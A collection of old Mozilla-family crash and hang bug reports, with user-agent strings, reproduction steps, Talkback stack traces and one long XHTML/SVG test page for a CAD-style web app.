269,566 | 2,327,758 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a5) Gecko/20041111 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a5) Gecko/20041111 Firefox/0.9.1+
Talkback was unfortunately not available (why ?) at installation time.
Reproducible: Always
Steps to Reproduce:
1. Load http://www.tiscali.be/FR/home/home_center.asp .
2. Reload 2 or 3 times.
Actual Results:
Crash.
Expected Results:
No crash.
Firefox 1.0 displays the page without problem.
|
|
275,564 | 2,367,146 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a6) Gecko/20041220
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a6) Gecko/20041220
message "XML Parsing Error: mismatched tag. Expected:
</http://www.w3.org/1999/xhtml�script>. Line Number 181, Column 5: .." (reported
A greater set of
- entity definitions in conjunction with
- script tags with file references
leading to "XML mismatched tag" message
text is sometimes showing random junk, e.g. out of Entity definitions)
looks like a buffer overrun error: vanishing,
- when some Entity declarations killed or
- scripts wirh external file references are killed
source using xhtml-math-svg/xhtml-math-svg.dtd
Reproducible: Always
Steps to Reproduce:
1. "Additional Information" is holding a nearly minimum XML file to reproduce
the error
2. start the file NotMismatched.xml (the file, checked with W3C so far as
possible, is not mismatched and - without SVG - running under firefox)
3. to disappear: take away first or last half of the Entities for greek
uppercase letters or (alternatively) all script tags with external references
Actual Results:
I have to go back to build 2004112523
1. "XML mismatched tag" message, often with crazy additional messages
XML Parsing Error: mismatched tag.
"Expected: </http://www.w3.org/1999/xhtml�script>" etc.
2. some - maybe wrong - changes leading to crashes (automatically reported)
3. killing all script tags with references to files, a page is built up,
also when changing the string in <html xmlns="http://www.w3.org/1999/xhtml"
xmlns:sv...
Expected Results:
A RESULT LIKE THAT SEEN BY FIREFOX or better (not SVG version)
builds up to 2004112523 were processing sufficiently, the SVG DOM acting as
expected.
Hoped to get marker functionality and have seen some - after killing all script
references.
<?xml version="1.0" encoding="ISO-8859-1" standalone="no"?>
<?xml-stylesheet href="http://www.w3.org/StyleSheets/TR/W3C-REC.css"
type="text/css"?>
<?xml-stylesheet href="St_sCADch.css" type="text/css"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0 plus SVG 1.1//EN"
"http://www.w3.org/2002/04/xhtml-math-svg/xhtml-math-svg.dtd" [
<!ENTITY abrasiveWork "▽">
<!ENTITY aleph "ℵ">
<!ENTITY arc "⌒">
<!ENTITY aroundProfile "⌮">
<!ENTITY bowtie "⋈">
<!ENTITY button "❑">
<!ENTITY circle "⊙">
<!ENTITY compose "⎄">
<!ENTITY conical "⌲">
<!ENTITY concentric "⌾">
<!ENTITY copyright "©">
<!ENTITY counterBore "⌴">
<!ENTITY counterSink "⌵">
<!ENTITY curve "↝">
<!ENTITY cut "✁">
<!ENTITY cylindric "⌭">
<!ENTITY degree "˚">
<!ENTITY diameter "⌀">
<!ENTITY dimension "↔">
<!ENTITY dimOrigin "⌱">
<!ENTITY dot1u2 "∴">
<!ENTITY dot2u1 "∵">
<!ENTITY dot4 "∷">
<!ENTITY dot2 "∶">
<!ENTITY drillhole "◙">
<!ENTITY drillthrough "●">
<!ENTITY eject "⏏">
<!ENTITY ellipse "ʘ">
<!ENTITY equalAndParallel "⋕">
<!ENTITY equiangular "≚">
<!ENTITY erase "⌦">
<!ENTITY euro "€">
<!ENTITY hot "♨">
<!ENTITY identical "≡">
<!ENTITY kill "☠">
<!ENTITY leftOver "↶">
<!ENTITY leftTurn "↺">
<!ENTITY line "╲">
<!ENTITY lines "☇">
<!ENTITY linesB "⌙">
<!ENTITY make "★">
<!ENTITY matterLeft "⍅">
<!ENTITY matterRight "⍆">
<!ENTITY matterDown "⍖">
<!ENTITY matterUp "⍏">
<!ENTITY mail "✉">
<!ENTITY mesh "⌗">
<!ENTITY midLines "⎈">
<!ENTITY minusPlus "∓">
<!ENTITY nearly "≈">
<!ENTITY norm "‖">
<!ENTITY notes "⁾">
<!ENTITY Ohm "Ω">
<!ENTITY paragraph "¶">
<!ENTITY perp "⊥">
<!ENTITY plusMinus "±">
<!ENTITY point "⌖">
<!ENTITY polyline "☈">
<!ENTITY polygon "⌂">
<!ENTITY proportional "∼">
<!ENTITY rarr "→">
<!ENTITY return "⏎">
<!ENTITY rightAngle "⊾">
<!ENTITY rightOver " ↷">
<!ENTITY rightTurn " ↻">
<!ENTITY save "✇">
<!ENTITY sector "⌔">
<!ENTITY segment "⌓">
<!ENTITY slope "⌳">
<!ENTITY symmCross "✜">
<!ENTITY symmetric "⌯">
<!ENTITY text "⌨">
<!ENTITY totalRunout "⌰">
<!ENTITY undo "⎌">
<!ENTITY waste "♲">
<!ENTITY wavyLine "⌇">
<!ENTITY warning "⚠">
<!ENTITY alpha "ɑ">
<!ENTITY beta "β">
<!ENTITY gamma "ɣ">
<!ENTITY delta "δ">
<!ENTITY epsilon "ε">
<!ENTITY zeta "ζ">
<!ENTITY eta "η">
<!ENTITY theta "θ">
<!ENTITY kappa "κ">
<!ENTITY lambda "λ">
<!ENTITY mu "μ">
<!ENTITY nu "ν">
<!ENTITY xi "ξ">
<!ENTITY omicron "ο">
<!ENTITY pi "π">
<!ENTITY plane "ε">
<!ENTITY rho "ρ">
<!ENTITY sigma "σ">
<!ENTITY tau "τ">
<!ENTITY upsilon "υ">
<!ENTITY phi "φ">
<!ENTITY chi "χ">
<!ENTITY psi "ψ">
<!ENTITY omega "ω">
<!ENTITY increment "∆">
<!ENTITY Alpha "Α">
<!ENTITY Beta "Β">
<!ENTITY Gamma "Γ">
<!ENTITY Delta "Δ">
<!ENTITY Epsilon "Ε">
<!ENTITY Zeta "Ζ">
<!ENTITY Eta "Η">
<!ENTITY Theta "Θ">
<!ENTITY Kappa "Κ">
<!ENTITY Lambda "Λ">
<!ENTITY Mu "Μ">
<!ENTITY Nu "Ν">
<!ENTITY Xi "Ξ">
<!ENTITY Omicron "Ο">
<!ENTITY Pi "Π">
<!ENTITY Rho "Ρ">
<!ENTITY Sigma "Σ">
<!ENTITY Tau "Τ">
<!ENTITY Upsilon "Υ">
<!ENTITY Phi "Φ">
<!ENTITY Chi "Χ">
<!ENTITY Psi "Ψ">
<!ENTITY Omega "Ω">
]>
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
xmlns:xlink="http://www.w3.org/1999/xlink">
<head>
<title>sCADch</title>
<script type="text/javascript" src="Basic_sCADch.js"/>
<script type="text/javascript" src="Basic1_sCADch.js"></script>
</head>
<body onload="init();">
<!-- p class="msg">start body</p -->
<svg:svg id="Pic" onkeyup=""> <!-- onmouseover="focus=Fxz"
style="z-index:2000;" !- width="900px" height="600px" style="position: fixed;
top: 0; left: 0; cursor: crosshair;" -->
<svg:defs>
<svg:g class="invisible">
<svg:foreignObject x="200" y="180" width="100" height="30">
<input type="text" value="demo" class="stranger"
onchange="objectModifier(this)" />
</svg:foreignObject>
</svg:g>
<svg:path id="P" d="M0 5v-10M-5 0h10a5 5 0 0 1 0 5" class="P"/>
<!-- svg:marker id="Triangle" viewBox="0 0 10 10" refX="0"
refY="5" markerUnits="strokeWidth" markerWidth="4" markerHeight="3"
orient="auto" style="stroke: orange; fill-opacity: 0.4;" -->
<svg:marker id="Triangle" viewBox="0 0 10 10" refX="0" refY="5"
style="marker-units: stroke-width; marker-width: 10px; marker-height: 10px;
orient: auto; stroke: orange; fill-opacity: 0.4;">
<svg:path d="M0 0L10 5L0 10z" />
</svg:marker>
<svg:pattern id="steel1" patternUnits="userSpaceOnUse" x="0" y="0"
width="30" height="30" viewBox="0 0 50 50">
<svg:line x1="0" y1="7" x2="7" y2="0" class="steel"/> <!-- to
be implemented in Mozilla SVG -->
</svg:pattern>
<svg:linearGradient id="Gl" gradientUnits="objectBoundingBox"
x1="0%" x2="35%" y1="0%" y2="35%" spreadMethod="reflect"> <!-- style="offset:
5%; stop-color: #F60F00;"-->
<svg:stop offset="0%" stop-color="#F60F00"/>
<svg:stop offset="100%" stop-color="#0060FF" />
</svg:linearGradient>
<svg:linearGradient id="Gr" gradientUnits="userSpaceOnUse" x1="0%"
x2="35%" y1="0%" y2="35%" spreadMethod="repeat">
<svg:stop offset="0%" stop-color="#000000"/>
<!--style="offset:5%; stop-color:#F60000;" /-->
<svg:stop offset="100%" stop-color="#000FFF"/> <!--
style="offset:95%; stop-color:#FFFFFF;" /-->
<!-- stop offset="70%" stop-color="#FFF000" / -->
</svg:linearGradient>
<svg:symbol id="SyP" class="pt" viewBox="0 0 10 10" width="10"
height="10" >
<svg:desc>sCADch symbol for "Point"</svg:desc>
<svg:g class="pt">
<svg:rect class="pt" x="2" y="2" height="6" width="6"/>
<svg:line class="pt" x1="0" y1="0" x2="4" y2="4"/>
<svg:line class="pt" x1="0" y1="10" x2="4" y2="6"/>
<svg:line class="pt" x1="10" y1="0" x2="6" y2="4"/>
<svg:line class="pt" x1="10" y1="10" x2="6" y2="6"/>
</svg:g>
</svg:symbol>
</svg:defs>
<!-- "corporate design" objects (test objects!!) -->
<svg:g class="example" transform="translate(600,300)" id="corps">
<svg:circle id="circ" r="1cm" cx="7.5cm" cy="0.28562cm" style="fill:
RGB(160,255,230); stroke: blue; fill-opacity: 0.3; stroke-width: 0; z-index:
inherit;"/>
<svg:circle id="circE" r="1cm" cx="7.50cm" cy="7.58562cm" style="fill:
RGB(255,245,210); fill-opacity: 0.5; stroke-width: 0; z-index: inherit;"/>
<svg:rect x="10" y="10" width="50" height="50" style="fill:
url(#steel1);"/> <!-- waiting for a version with Schraffur in Mozilla SVG -->
<svg:rect x="10" y="60" width="30" height="50" style="fill:
url(#Gl); opacity:0.5;"/>
<svg:rect x="10" y="110" width="30" height="50" fill="url(#Gr)"/>
<svg:rect id="schr" x="40" y="110" width="30" height="50"
fill="url(#Gr)" style="fill-opacity:0.3;"/>
<svg:rect x="40" y="210" width="-30" height="-50" style="fill:
url(#Gr);"/>
<svg:use x="10" y="20" xlink:href="#schr" width="100" height="100" />
<svg:line id="marktest" x1="50" y1="200" x2="200" y2="100"
style="stroke: #E8F0F0; marker-end: url(#Triangle); stroke-width: 2;
marker-start: url(#Triangle);"/> <!-- marker: url(#Triangle);
marker:'url(#Triangle)' xlink:href="#Triangle"/ -->
<svg:line id="marktest2" x1="60" y1="200" x2="210" y2="100"
class="test"/>
<!-- svg:line id="linma" x1="50" y1="200" x2="200" y2="100"
style="marker: 'url(#Triangle)'; stroke-width: 2;"/ -->
<!-- svg:line id="linmA" x1="50" y1="200" marker='url(#Triangle)'
x2="100" y2="60" style="stroke-width: 2;"/ -->
</svg:g>
<svg:g id="Gxz" onmouseover="focus=Fxz">
<svg:svg id="Sxz" width="600px" height="300px" viewBox="0 0 600 300">
<svg:polygon class="svg" points="0,0 599,0 599,299 0,299"/> <!--
style="stroke: #CCCCB0; fill: #C0DDDD; opacity: 0.2;"/ -->
</svg:svg>
</svg:g>
<!-- svg:path transform="translate(0,0)" id="Xxz" d="M0 2000 L0 5 M0
-5 L 0 -2000 M-2000 0 L-5 0 M5 0 L2000 0" class="cross"/ -->
<svg:path transform="translate(0,0)" id="Xxz" d="M0 2000 L 0 -2000
M-2000 0 L2000 0" class="cross"/>
<svg:g id="Gxy" class="svg" transform="translate(0,300)"
onmouseover="focus=Fxy">
<svg:svg id="Sxy" width="600px" height="300px" viewBox="0 0 600
300"> <!-- style="stroke: red; stroke-width: 1; fill: #DDC0DD; fill-opacity:
0.3; overflow: hidden;"-->
<svg:polyline class="svg" points="0,0 599,0 599,299 0,299 0,0"/>
<!--style="stroke: #CCCCB0; fill: #C0DDDD; opacity: 0.2;"/-->
<svg:line id="Xxy" x1="-2000" y1="0" x2="2000" y2="0" class="cross"/>
<!-- svg:path transform="translate(0,0)" id="Xxy" d="M2000 0 L5 0
M-5 0 L -2000 0" class="cross"/ -->
</svg:svg>
</svg:g>
<svg:g id="Gyz" transform="translate(600,0)" onmouseover="focus=Fyz">
<svg:svg id="Syz" width="300px" height="300px" viewBox="0 0 300
300"> <!-- style="stroke: #88AABB; stroke-width: 1; fill: #DDDDC0; fill-opacity:
0.2; overflow: hidden;"-->
<svg:polyline class="svg" points="0,0 299,0 299,299 0,299 0,0"/>
<svg:line id="Xyz" x1="0" y1="2000" x2="0" y2="-2000" class="cross"/>
<!-- svg:path transform="translate(0,0)" id="Xyz" d="M0 2000 L0 5
M0 -5 L 0 -2000" class="cross"/ -->
</svg:svg>
</svg:g>
</svg:svg>
<form id="cmdTableau">
<p><input type="text" width="23" readonly="readonly" id="ioLine"
title="show input value on click"/>
<input type="text" width="12" readonly="readonly" id="ioChar"
title="general IO input line"/>
</p>
<p><span>&point;</span><img src="space.gif" class="cmdCol1"/>
<button type="button" id="NumPoint" onclick="setPoint()" title="set a
point with actual coordinates" style="color: black;"><h3>&point;</h3></button>
<button type="button" title="set next | read actual point: x coord"
style="border-style:none; z-index: 0; position: absolute; background-color:
transparent;" class="block"><tt>x</tt></button><input type="text" id="NumX"
value="" onclick="copyText(this)"/>
<button type="button" title="set next | read actual point: y coord"
style="border-style:none; z-index: 0; position: absolute; background-color:
transparent;" class="block"><tt>y</tt></button><input type="text" id="NumY"
value="" onclick="copyText(this)"/>
<button type="button" title="set next | read actual point: z coord"
style="border-style:none; z-index: 0; position: absolute; background-color:
transparent;" class="block"><tt>z</tt></button><input type="text" id="NumZ"
value="" onclick="copyText(this)"/>
</p>
<p><span>&line;</span><img src="space.gif" class="cmdCol1"/>
<button type="button" id="Line" title="make one distinct construction
line(s)" onclick="makeLine()" class="L"><h1>&line;</h1></button>
<button type="button" id="Lines" title="make connected, but distinct
construction lines" onclick="makeLines()" class="L"><h3>&lines;</h3></button>
</p>
<p class="P"><span>&polygon;</span><img src="space.gif" class="cmdCol1"/>
<button type="button" id="Polygon" title="polygon; 3D straight lines,
auto closing" onclick="makePolyline(Polygonclass,'polygon')"
class="P"><h3>&polygon;</h3></button>
<button type="button" id="PolygonHold" title="polygon, hold points; 3D
straight lines, auto closing" onclick="makePolyline(Polygonclass,'polygon',1)"
class="P"><h3>&polygon;</h3><em> &point;</em></button>
<button type="button" id="Polyline" title="polyline; 3D straight
lines" onclick="makePolyline(Polylineclass,'polyline')"><h3>&polyline;</h3></button>
<button type="button" id="PolylineHold" title="polyline, hold points;
3D straight lines"
onclick="makePolyline(Polylineclass,'polyline',1)"><h3>&polyline;</h3><em> &point;</em></button>
</p>
<p class="C"><span>&circle;</span><img src="space.gif" class="cmdCol1"/>
<button type="button" id="doCircle" title="circle from 3 peripheral
points" onclick="makeCircle()" class="C"><u>&circle;</u></button>
<button type="button" id="doCircleHold" title="circle from 3
peripheral points, hold points" onclick="makeCircle(1)"
class="C"><u>&circle;</u><em> &point;</em></button>
<button type="button" id="doEllipse" title="ellipse,
&point;1-&point;3:plane, &point;1+&point;4:ˆ&cylindric; axe, &point;2 on
&ellipse;" onclick="makeEllipse()"><em>&ellipse;</em></button>
<button type="button" id="doEllipseHold" title="ellipse, hold points"
onclick="makeEllipse(1)"><em>&ellipse;</em><em> &point;</em></button>
</p>
<p><span>&plane;</span><img src="space.gif" class="cmdCol1"/>
<button type="button" id="Ebene" title="make plane, 3 points"
onclick="setPlane()" class="E"><h3>&dot1u2;</h3></button>
<button type="button" id="EbeneN" title="make plane, ⊥"
onclick="setPlaneN()" class="E"><h3>⊥</h3></button>
<button type="button" id="WorksPlane" title="+/- set/unset work plane"
onclick="setWorkPlane('this')" class="E"><em>&plane;</em><h3>±</h3></button>
<button type="button" id="Ebene3" title="3rd coordinate of points:
point on work plane" onclick="setToPlane()"
class="E"><em>&plane;</em><h3>→</h3></button>
</p>
<p><span>?</span><img src="space.gif" class="cmdCol1"/>
<button type="button" id="erase" title="erase elements"
onclick="EraseObjects()" class="W"><h3>&erase;</h3><h2>&kill;</h2></button>
<button type="button" id="crazy" title="init, to be used, when auto
init was failing" onclick="init()" class="S"><u>ℵ</u></button>
<!-- <button type="button" id="ttxt" onclick="tytxt()">ttxt</button> -->
<button type="button" id="ClearText" title="clear information text
area" onclick="ClearWrite()" class="S"><em>&text;</em><h3>&erase;</h3></button>
<button type="button" id="toDump" title="dump notes to text area;
toggle button" onclick="dumpen=!dumpen"
class="S"><em>&text;</em><h3>±</h3></button>
</p>
<p>
<span id="ButtRest">&button;</span><img src="space.gif" class="cmdCol1"/>
<button type="button" class="block"><tt>id</tt></button> <input
type="text" id="idButt" title="button identifier" onclick="copyText(this)"/>
<button type="button" class="block"><tt>sym</tt></button> <input
type="text" id="symButt" title="button text/symbol (use unicode chars)"
onclick="copyText(this)"/>
<button type="button" class="block"><tt>func</tt></button> <input
type="text" id="fuButt" title="button functionality, event action, e.g.
function call" onclick="copyText(this)"/>
<button type="button" class="block"><tt>class</tt></button><input
type="text" id="classButt" title="button style class, optional, for definition
requirements see class butt" onclick="copyText(this)"/>
<button type="button" class="block"><tt>type</tt></button> <input
type="text" id="typeButt" title="button type, mainly 'button'|'text'"
value="button" onclick="copyText(this)"/>
<button type="button" class="block"><tt>desc</tt></button> <input
type="text" id="descButt" title="key title, describe functionality!"
onclick="copyText(this)"/>
<button type="button" id="mkButt" onclick="makeButton()" title="make
button. button position: mousedown and mousemove. fix position: ¬
button"><em>&make;</em></button>
<button type="button" onclick="standardButtonPlaces()" title="position
moveable or, when confirming: first click: last button places, second: initial
places"><h1>←</h1></button>
<button type="button" onclick="cancelButton('idButt')" title="pos
button using key m, mousedown and mousemove"><h1>¬</h1></button>
</p>
<p>
<textarea id="Dump"></textarea>
</p>
</form>
<!-- p class="msg">at end of body</p -->
</body>
</html>
|
|
279,205 | 2,392,416 |
I think (though of course I'm not entirely sure) that this is fallout from bug
244366; I only started crashing with today's build; usually when loading large
pages (such as Bonsai checkins) and doing something while it's doing that (i.e.
moving the mouse).
I still don't have the steps to reproduce yet, sorry.
0x00000000
nsEventStateManager::DispatchMouseEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventStateManager.cpp,
line 2542]
nsEventStateManager::GenerateMouseEnterExit
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventStateManager.cpp,
line 2618]
nsEventStateManager::PreHandleEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventStateManager.cpp,
line 474]
PresShell::HandleEventInternal
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsPresShell.cpp,
line 5902]
PresShell::HandleEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsPresShell.cpp,
line 5761]
nsViewManager::HandleEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsViewManager.cpp,
line 2424]
nsViewManager::DispatchEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsViewManager.cpp,
line 2151]
HandleEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsView.cpp,
line 174]
nsWindow::DispatchEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp,
line 1103]
nsWindow::DispatchMouseEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp,
line 5402]
ChildWindow::DispatchMouseEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp,
line 5653]
nsWindow::WindowProc
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp,
line 1389]
USER32.dll + 0x8709 (0x77d48709)
USER32.dll + 0x87eb (0x77d487eb)
USER32.dll + 0x89a5 (0x77d489a5)
USER32.dll + 0x89e8 (0x77d489e8)
nsAppShell::Run
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsAppShell.cpp,
line 159]
nsAppStartup::Run
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/components/startup/src/nsAppStartup.cpp,
line 208]
main
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp,
line 1811]
WinMain
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp,
line 1839]
kernel32.dll + 0x16d4f (0x7c816d4f)
|
|
322,636 | 2,741,561 |
Using the redo shortcut if you haven't used undo first, in the find bar, crashes firefox when you try typing again.
Steps to reproduce:
1. Open fayt by typing or ctrl-f for find
2. Hit the redo shortcut (ctrl-y in windows, or F3 if you have a Microsoft kb with the function lock off, heh)
3. Wait for the bar to disappear.
4. Type again to open fayt bar/ctrl-f for find (either of these will do no matter which one you did for 1)
5. Yay!
Doesn't crash if you undo first.
|
|
322,683 | 2,741,897 |
There is no clear regressionwindow/cause found for this bug but it is too critical to wait reporting
reported on
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060106 Firefox/1.5 ID:2006010603
TB13674807W
and
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20060106 Firefox/1.5 ID:2006010603
TB13673645G
Incident ID: 13674807
Stack Signature nsScriptSecurityManager::CheckSameOriginPrincipalInternal b86a7215
Product ID Firefox2
Build ID 2006010603
Trigger Time 2006-01-07 07:25:35.0
Platform Win32
Operating System Windows NT 5.1 build 2600
Module firefox.exe + (0009fcca)
URL visited Yahoo! Beta Mail
User Comments
Since Last Crash 3730 sec
Total Uptime 3730 sec
Trigger Reason Access violation
Source File, Line No. c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/caps/src/nsScriptSecurityManager.cpp, line 849
Stack Trace
nsScriptSecurityManager::CheckSameOriginPrincipalInternal [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/caps/src/nsScriptSecurityManager.cpp, line 849]
nsScriptSecurityManager::CheckSameOriginPrincipal [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/caps/src/nsScriptSecurityManager.cpp, line 596]
nsGenericElement::doReplaceChild [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/base/src/nsGenericElement.cpp, line 3583]
nsDocument::ReplaceChild [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/base/src/nsDocument.cpp, line 3526]
XPCWrappedNative::CallMethod [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp, line 2139]
XPC_WN_CallMethod [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp, line 1444]
js_Invoke [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 1177]
js_Interpret [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 3523]
js_Invoke [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 1197]
js_Interpret [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 3523]
js_Invoke [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 1197]
fun_apply [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsfun.c, line 1606]
js_Invoke [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 1177]
js_Interpret [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 3523]
js_Invoke [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsinterp.c, line 1197]
nsXPCWrappedJSClass::CallMethod [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp, line 1369]
nsXPCWrappedJS::CallMethod [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp, line 462]
SharedStub [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp, line 147]
nsXMLHttpRequest::ChangeState [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/extensions/xmlextras/base/src/nsXMLHttpRequest.cpp, line 1857]
nsXMLHttpRequest::RequestCompleted [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/extensions/xmlextras/base/src/nsXMLHttpRequest.cpp, line 1411]
nsXMLHttpRequest::OnStopRequest [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/extensions/xmlextras/base/src/nsXMLHttpRequest.cpp, line 1359]
nsMultipartProxyListener::OnStopRequest [c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/extensions/xmlextras/base/src/nsXMLHttpRequest.cpp, line 202]
|
|
324,650 | 2,757,252 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050925 Firefox/1.0.4 (Debian package 1.0.4-2sarge5)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050925 Firefox/1.0.4 (Debian package 1.0.4-2sarge5)
I built a switch-statement with 1800 cases which should generate a JSOP_LOOKUPSWITCHX. But it hangs in BuildSpanDepTable(JSContext *cx, JSCodeGenerator *cg) (in jsemit.c) in an infinite loop.
Reproducible: Always
Steps to Reproduce:
1. load html with big switch-statement
2.
3.
Actual Results:
infinite loop
Expected Results:
changed picture
Infinite loop in:
- 1.0pre (debug Linux/Windows XP)
- 1.0.4 (Debian Sarge)
- 1.5 (Windows)
|
|
315,453 | 2,690,427 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051107 SeaMonkey/1.5a
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051107 SeaMonkey/1.5a
After you open the Composer to answer a posting(its not necessary to send the answer), SeaMonkey crash when you close SeaMonkey after that.
Reproducible: Always
Steps to Reproduce:
1.Open MailNews
2.Select a mail/posting
3.Klick on 'Reply'
4.Leave the composer after that(sending an answer is not necessary)
5.Close Seamonkey
Actual Results:
Crash after the SeaMonkey-Window allready is closed
Expected Results:
no crash
Linux-builds are allso affected.
|
|
316,049 | 2,694,885 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
crash on GM Canada web site when configuring a car, choosing 'view deatil' on the car options.
Reproducible: Always
Steps to Reproduce:
1.Open to soon to be attach test case
Actual Results:
crash Firefox
|
|
316,176 | 2,695,842 |
crashed during send after clicking send version 1.6a1 (20051108)
TB11749054
Incident ID: 11749054
Stack Signature nsWindowSH::GetProperty 3336da4c
Product ID ThunderbirdTrunk
Build ID 2005110810
Trigger Time 2005-11-12 03:36:05.0
Platform Win32
Operating System Windows NT 5.1 build 2600
Module thunderbird.exe + (00128276)
URL visited
User Comments sending mail s/vseerror
Since Last Crash 166327 sec
Total Uptime 168645 sec
Trigger Reason Access violation
Source File, Line No. e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/dom/src/base/nsDOMClassInfo.cpp, line 4081
Stack Trace
nsWindowSH::GetProperty [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/dom/src/base/nsDOMClassInfo.cpp, line 4081]
XPC_WN_Helper_GetProperty [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp, line 946]
js_Interpret [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/js/src/jsinterp.c, line 3616]
js_Invoke [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/js/src/jsinterp.c, line 1197]
nsXPCWrappedJSClass::CallMethod [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp, line 1369]
nsXPCWrappedJS::CallMethod [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp, line 462]
SharedStub [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp, line 147]
nsObserverService::NotifyObservers [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/xpcom/ds/nsObserverService.cpp, line 235]
